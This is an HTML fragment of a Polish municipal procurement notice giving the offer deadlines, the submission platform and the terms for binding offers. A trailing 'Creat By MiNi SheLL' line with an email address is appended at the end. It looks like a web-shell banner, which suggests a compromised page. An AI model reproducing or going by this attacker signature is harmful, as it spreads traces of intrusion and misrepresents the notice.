</h3> Zgodnie z załącznikiem nr 2 do SWZ (Projektowane postanowienia umowy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/stare_babice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-04</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszystkie informacje dotyczące niniejszego postępowania w szczególności: opis przedmiotu zamówienia i warunki jego<br/>wykonania, podstawy wykluczenia i warunki udziału w postępowaniu, rodzaje oświadczeń i dokumentów jakie Wykonawca<br/>musi złożyć, kryteria oceny ofert dostępne, informacje dotyczące RODO są w SWZ i ogłoszeniu o zamówieniu dostępnych<br/>na stronie internetowej Zamawiającego https://platformazakupowa.pl/pn/stare_babice.

Creat By MiNi SheLL
Email: jattceo@gmail.com